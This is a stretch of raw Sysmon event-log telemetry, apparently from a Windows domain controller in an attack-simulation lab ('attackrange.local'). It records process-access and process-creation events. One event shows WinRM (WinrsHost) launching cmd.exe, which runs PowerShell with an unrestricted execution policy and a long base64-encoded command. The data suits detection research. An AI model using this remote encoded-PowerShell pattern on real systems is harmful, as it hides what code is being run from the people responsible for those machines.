13:54:08.864{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003512Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:08.864{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003511Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:08.864{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003510Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:08.864{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003509Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:08.864{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003508Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:08.864{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003507Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:08.864{10ACEC4A-853E-5FCF-0500-000000009101}6442448C:\Windows\system32\csrss.exe{10ACEC4A-8580-5FCF-AC00-000000009101}4296C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003506Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:08.864{10ACEC4A-8580-5FCF-AA00-000000009101}44324288C:\Windows\system32\WinrsHost.exe{10ACEC4A-8580-5FCF-AC00-000000009101}4296C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\WinrsHost.exe+2c94|C:\Windows\system32\WinrsHost.exe+2eb1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b 154100x80000000000000003505Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:08.875{10ACEC4A-8580-5FCF-AC00-000000009101}4296C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBhAFEAQgBtAEEAQwBBAEEASwBBAEEAawBBAEYAQQBBAFUAdwBCAFcAQQBHAFUAQQBjAGcAQgB6AEEARwBrAEEAYgB3AEIAdQBBAEYAUQBBAFkAUQBCAGkAQQBHAHcAQQBaAFEAQQB1AEEARgBBAEEAVQB3AEIAVwBBAEcAVQBBAGMAZwBCAHoAQQBHAGsAQQBiAHcAQgB1AEEAQwBBAEEATABRAEIAcwBBAEgAUQBBAEkAQQBCAGIAQQBGAFkAQQBaAFEAQgB5AEEASABNAEEAYQBRAEIAdgBBAEcANABBAFgAUQBBAGkAQQBEAE0AQQBMAGcAQQB3AEEAQwBJAEEASwBRAEEAZwBBAEgAcwBBAEMAZwBBAG4AQQBIAHMAQQBJAGcAQgBtAEEARwBFAEEAYQBRAEIAcwBBAEcAVQBBAFoAQQBBAGkAQQBEAG8AQQBkAEEAQgB5AEEASABVAEEAWgBRAEEAcwBBAEMASQBBAGIAUQBCAHoAQQBHAGMAQQBJAGcAQQA2AEEAQwBJAEEAUQBRAEIAdQBBAEgATQBBAGEAUQBCAGkAQQBHAHcAQQBaAFEAQQBnAEEASABJAEEAWgBRAEIAeABBAEgAVQBBAGEAUQBCAHkAQQBHAFUAQQBjAHcAQQBnAEEARgBBAEEAYgB3AEIAMwBBAEcAVQBBAGMAZwBCAFQAQQBHAGcAQQBaAFEAQgBzAEEARwB3AEEASQBBAEIAMgBBAEQATQBBAEwAZwBBAHcAQQBDAEEAQQBiAHcAQgB5AEEAQwBBAEEAYgBnAEIAbABBAEgAYwBBAFoAUQBCAHkAQQBDAEkAQQBmAFEAQQBuAEEAQQBvAEEAWgBRAEIANABBAEcAawBBAGQAQQBBAGcAQQBEAEUAQQBDAGcAQgA5AEEAQQBvAEEASgBBAEIAbABBAEgAZwBBAFoAUQBCAGoAQQBGADgAQQBkAHcAQgB5AEEARwBFAEEAYwBBAEIAdwBBAEcAVQBBAGMAZwBCAGYAQQBIAE0AQQBkAEEAQgB5AEEAQwBBAEEAUABRAEEAZwBBAEMAUQBBAGEAUQBCAHUAQQBIAEEAQQBkAFEAQgAwAEEAQwBBAEEAZgBBAEEAZwBBAEUAOABBAGQAUQBCADAAQQBDADAAQQBVAHcAQgAwAEEASABJAEEAYQBRAEIAdQBBAEcAYwBBAEMAZwBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQQBnAEEARAAwAEEASQBBAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBGADgAQQBjAHcAQgAwAEEASABJAEEATABnAEIAVABBAEgAQQBBAGIAQQBCAHAAQQBIAFEAQQBLAEEAQgBBAEEAQwBnAEEASQBnAEIAZwBBAEQAQQBBAFkAQQBBAHcAQQBHAEEAQQBNAEEAQgBnAEEARABBAEEASQBnAEEAcABBAEMAdwBBAEkAQQBBAHkAQQBDAHcAQQBJAEEAQgBiAEEARgBNAEEAZABBAEIAeQBBAEcAawBBAGIAZwBCAG4AQQBGAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAUABBAEgAQQBBAGQAQQBCAHAAQQBHADgAQQBiAGcAQgB6AEEARgAwAEEATwBnAEEANgBBAEYASQBBAFoAUQBCAHQAQQBHADgAQQBkAGcAQgBsAEEARQBVAEEAYgBRAEIAdwBBAEgAUQBBAGUAUQBCAEYAQQBHADQAQQBkAEEAQgB5AEEARwBrAEEAWgBRAEIAegBBAEMAawBBAEMAZwBCAEoAQQBHAFkAQQBJAEEAQQBvAEEAQwAwAEEAYgBnAEIAdgBBAEgAUQBBAEkAQQBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQQB1AEEARQB3AEEAWgBRAEIAdQBBAEcAYwBBAGQAQQBCAG8AQQBDAEEAQQBMAFEAQgBsAEEASABFAEEASQBBAEEAeQBBAEMAawBBAEkAQQBCADcAQQBDAEEAQQBkAEEAQgBvAEEASABJAEEAYgB3AEIAMwBBAEMAQQBBAEkAZwBCAHAAQQBHADQAQQBkAGcAQgBoAEEARwB3AEEAYQBRAEIAawBBAEMAQQBBAGMAQQBCAGgAQQBIAGsAQQBiAEEAQgB2AEEARwBFAEEAWgBBAEEAaQBBAEMAQQBBAGYAUQBBAEsAQQBGAE0AQQBaAFEAQgAwAEEAQwAwAEEAVgBnAEIAaABBAEgASQBBAGEAUQBCAGgAQQBHAEkAQQBiAEEAQgBsAEEAQwBBAEEATABRAEIATwBBAEcARQBBAGIAUQBCAGwAQQBDAEEAQQBhAGcAQgB6AEEARwA4AEEAYgBnAEIAZgBBAEgASQBBAFkAUQBCADMAQQBDAEEAQQBMAFEAQgBXAEEARwBFAEEAYgBBAEIAMQBBAEcAVQBBAEkAQQBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQgBiAEEARABFAEEAWABRAEEASwBBAEMAUQBBAFoAUQBCADQAQQBHAFUAQQBZAHcAQgBmAEEASABjAEEAYwBnAEIAaABBAEgAQQBBAGMAQQBCAGwAQQBIAEkAQQBJAEEAQQA5AEEAQwBBAEEAVwB3AEIAVABBAEcATQBBAGMAZwBCAHAAQQBIAEEAQQBkAEEAQgBDAEEARwB3AEEAYgB3AEIAagBBAEcAcwBBAFgAUQBBADYAQQBEAG8AQQBRAHcAQgB5AEEARwBVAEEAWQBRAEIAMABBAEcAVQBBAEsAQQBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQgBiAEEARABBAEEAWABRAEEAcABBAEEAbwBBAEoAZwBBAGsAQQBHAFUAQQBlAEEAQgBsAEEARwBNAEEAWAB3AEIAMwBBAEgASQBBAFkAUQBCAHcAQQBIAEEAQQBaAFEAQgB5AEEAQQA9AD0AC:\Users\Administrator\ATTACKRANGE\Administrator{10ACEC4A-8580-5FCF-A596-060000000000}0x696a50HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{10ACEC4A-8580-5FCF-AA00-000000009101}4432C:\Windows\System32\winrshost.exeC:\Windows\system32\WinrsHost.exe -Embedding 10341000x80000000000000003504Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:08.864{10ACEC4A-853E-5FCF-0B00-000000009101}864100C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003503Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:08.864{10ACEC4A-853E-5FCF-0B00-000000009101}864100C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003502Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:08.864{10ACEC4A-853E-5FCF-0B00-000000009101}864100C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003501Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:08.864{10ACEC4A-8541-5FCF-1500-000000009101}13641444C:\Windows\system32\svchost.exe{10ACEC4A-8580-5FCF-AA00-000000009101}4432C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\winrscmd.dll+8d36|C:\Windows\system32\winrscmd.dll+92d5|C:\Windows\system32\winrscmd.dll+af31|C:\Windows\system32\winrscmd.dll+23dc|c:\windows\system32\wsmsvc.dll+155ac7|c:\windows\system32\wsmsvc.dll+13f76d|c:\windows\system32\wsmsvc.dll+13f3cf|c:\windows\system32\wsmsvc.dll+13fcb2|c:\windows\system32\wsmsvc.dll+9ab10|c:\windows\system32\wsmsvc.dll+9b611|c:\windows\system32\wsmsvc.dll+4495|c:\windows\system32\wsmsvc.dll+16816c|c:\windows\system32\wsmsvc.dll+1689b8|c:\windows\system32\wsmsvc.dll+16345b|c:\windows\system32\wsmsvc.dll+163125|c:\windows\system32\wsmsvc.dll+14ce9c|c:\windows\system32\wsmsvc.dll+130049|c:\windows\system32\wsmsvc.dll+13571a|c:\windows\system32\wsmsvc.dll+12f47e|c:\windows\system32\wsmsvc.dll+125587|c:\windows\system32\wsmsvc.dll+11f562|c:\windows\system32\wsmsvc.dll+124574 10341000x80000000000000003500Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:08.849{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8580-5FCF-AA00-000000009101}4432C:\Windows\system32\WinrsHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003499Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:08.849{10ACEC4A-8580-5FCF-AB00-000000009101}45284412C:\Windows\system32\conhost.exe{10ACEC4A-8580-5FCF-AA00-000000009101}4432C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003498Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:08.833{10ACEC4A-853E-5FCF-0500-000000009101}6442448C:\Windows\system32\csrss.exe{10ACEC4A-8580-5FCF-AB00-000000009101}4528C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003497Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:08.833{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003496Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:08.833{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003495Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:08.833{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003494Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:08.833{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003493Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 